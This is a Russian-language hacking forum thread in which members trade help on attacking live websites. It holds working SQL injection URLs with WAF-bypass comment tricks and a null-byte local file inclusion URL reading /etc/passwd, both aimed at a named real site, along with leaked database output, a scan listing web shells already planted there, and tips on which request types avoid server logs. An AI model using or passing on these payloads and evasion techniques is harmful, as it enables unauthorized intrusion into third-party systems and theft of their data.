Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    909
    Reputations:
    863
    тут маленькая поправочку про коментирую, правильно не table_schema , а information_schema
    дальше, вот что говорит один из справочников:
    цитата:
    В MySQL версии 5.0 и выше есть база INFORMATION_SCHEMA. Это виртуальная база (не хранится в виде файлов, а формируется во время запуска сервера), содержащая метаданные баз данных, т.е. информацию о структуре баз данных. Доступна только для чтения.
    полностью о information_schema сможешь прочитать здесь:
    а об альтернативе запроса тебе уже постом выше привели пример:

    и еще, дополнительно, mysql 4<=4.9 надо брутить так как иначе информацию больше не вытощить, по крайней мере о пабликах таких не вкурсе...
    для брута могу порекомендовать две проги которые проверены на практике:
    toolza1.0
    sqliHelper 2.7
     
    _________________________
  2. SaNn

    SaNn New Member

    Joined:
    17 Apr 2011
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    0x3a3a3a = :::
    0x3a = :
    Это не синтаксическая ошибка.
     
  3. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    winstrool
    Ты только вчера спрашивал как вывести список таблиц в 4ой версии,а сейчас уже отвечаешь на вопросы людей?

    1. 0x3a3a3a - это синтаксическая ошибка? Открой свой любимый манул на MySQL и прочитай про эту ф-цию. Первым аргументом она приминает разделитель, можно написать concat_ws(':',a,b,c), но вариант не 100% т.к. много где используется magic_quotes, а 0x3a это : в кодировке HEX. Ты можешь туда что угодно написать, любой сделать разделитель.

    2. К чему твоя "поправочка"? Человек все правильно выводит из таблицы information_schema при условии что table_schema (БД в которой находится таблица)=нужной ему.
     
  4. Savage Boy

    Savage Boy New Member

    Joined:
    16 Dec 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Sql Injection

    Такой вопрос.

    Запрос типа: newsid=-1+union+/*!select*/+1,concat%28version%28%29,0x3a,user%28%29,0x3a,database%28%29%29,3,4,5,6,7,8

    у меня проходит. Версия базы 5-я. Но дело в том, что на сайте стоит жесткая фильтрация и если вписать просто select без /*!*/ то выдает ошибку: "An appropriate representation of the requested resource / could not be found on this server.". Проблема такая. Когда я пишу слово table_name в любом запросе, то выходит опять ошибка: "An appropriate representation.... Как я понимаю, он фильтрует и слова определенные. Как обойти эту фильтрацию?
     
  5. MTV

    MTV New Member

    Joined:
    16 Feb 2011
    Messages:
    180
    Likes Received:
    2
    Reputations:
    0
    Ребят,возможно вопрос не в тему,но все же.Вот при раскрутки скули сильно ли палишься?надо юзать прокси или что нибудь еще?И что за это может быть?Помогите новичку)
     
  6. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    Это называется WAF. Ищи в гугле способы обхода WAF. Я не думаю, что фильтруется table_name. Скорее всего FROM, либо таблица INFORMATION_SCHEMA. Это можно обойти так же комментариями, но не всегда. Впиши просто в запрос: id=1+union \ select \ table_name \ from и т.д., чтобы узнать что из этого фильтруется.


    Когда SQLi в GET-параметрах - палится легко, ты жестко следишь в логах, в POST или же COOKIE - нет, эти запросы в логи не попадают.
    А на счет безопасности тебе в соответствующий раздел читать статьи.
     
  7. ta-kyn

    ta-kyn Member

    Joined:
    7 May 2009
    Messages:
    41
    Likes Received:
    8
    Reputations:
    2
    Нашел local include. При попытке подняться из домашней директории юзверя и подценить какой-нибудь лог и т.д. Получаю: Method Not Implemented. GET to /index.php not supported.

    В чем подвох? Как-то хитро настроено серверное ПО?
     
  8. Tigger

    Tigger Elder - Старейшина

    Joined:
    27 Aug 2007
    Messages:
    936
    Likes Received:
    527
    Reputations:
    204
    На сервере стоит Mod Security, который не позволяет выполнять твои запросы.
     
    1 person likes this.
  9. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    ta-kyn

    линк сюда скинь
     
    _________________________
  10. ta-kyn

    ta-kyn Member

    Joined:
    7 May 2009
    Messages:
    41
    Likes Received:
    8
    Reputations:
    2
    Прошу:
    http://www.libertarias.com/index.php?menu=4&op=../бла-бла%00
     
  11. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Он на нулл-байт так реагирует, а не на "../"
     
  12. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12

    Там. три залитых шелла:

    » http://www.libertarias.com/.htaccess HTTP 403 Forbidden
    » http://www.libertarias.com/.htconfig HTTP 403 Forbidden
    » http://www.libertarias.com/.htpasswd HTTP 403 Forbidden
    » http://www.libertarias.com/.htaccess.1 HTTP 403 Forbidden
    » http://www.libertarias.com/css/ HTTP 200 OK
    » http://www.libertarias.com/img/ HTTP 200 OK
    » http://www.libertarias.com/js/ HTTP 200 OK
    » http://www.libertarias.com/stats/ HTTP 401 Authorization Required
    » http://www.libertarias.com/temp/ HTTP 200 OK
    » http://www.libertarias.com/c99.php HTTP 503 Service Unavailable
    » http://www.libertarias.com/favicon.ico HTTP 200 OK
    » http://www.libertarias.com/index.php HTTP 200 OK
    » http://www.libertarias.com/r57.php HTTP 503 Service Unavailable
    » http://www.libertarias.com/shell.php HTTP 503 Service Unavailable
     
  13. +toxa+

    +toxa+ Smack! SMACK!!!

    Joined:
    16 Jan 2005
    Messages:
    1,674
    Likes Received:
    1,029
    Reputations:
    1,228
    чё ж ты не заюзал эти шеллы, раз там они есть?)

    это банальный случай, на сервере ids или аналог.
     
    _________________________
  14. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Если сервер грамотно настроен, то попадают
     
  15. FlaktW

    FlaktW Elder - Старейшина

    Joined:
    19 Aug 2009
    Messages:
    500
    Likes Received:
    33
    Reputations:
    12
    Попробуй сам заюзать:

    http://www.libertarias.com/index.php?menu=3&op=5&autor=-110')+union+select+1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6+--+

    5.1.39-log:libertarias:[email protected]:pc-linux-gnu
     
  16. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    прошу
    http://www.libertarias.com/index.php?menu=4&op=../../../../etc//passwd%00&a=0
     
    4 people like this.
  17. ta-kyn

    ta-kyn Member

    Joined:
    7 May 2009
    Messages:
    41
    Likes Received:
    8
    Reputations:
    2
    =). Благодарю. А почему ..../../etc//passwd%00... ?
     
  18. Savage Boy

    Savage Boy New Member

    Joined:
    16 Dec 2008
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Спасибо что активно помогаешь новичкам в вопросах. Прочитал про WAF, честно говоря первый раз слышу. Ну я решил ввести весь запрос в комментарии. Вышло так: -1+union+/*!select+1,version(),3,4,5,6,7,8*/ Все работает. При таком запросе: -1+union+/*!select+1,table_name,3,4,5,6,7,8+from+INFORMATION_SCHEMA.TABLES+limit+1,1*/ Он не выводит названия таблиц (лимит менял на разные). Даже 2 дня назад когда (даже не знав о WAF) комментировал запрос table_name и запрос проходил без ошибок, то он все равно не выдавал названия таблиц. Подскажи куда копать дальше.
     
  19. freezed

    freezed Member

    Joined:
    27 Aug 2010
    Messages:
    154
    Likes Received:
    22
    Reputations:
    7
    просто потому, что /etc/passwd и еще часть файлов фильтруется, а другие можно и с одним слешем читать
     
  20. Osstudio

    Osstudio Banned

    Joined:
    17 Apr 2011
    Messages:
    638
    Likes Received:
    160
    Reputations:
    81
    Где можно скачать toolz'у, уде скомпиленную?!
     
Thread Status:
Not open for further replies.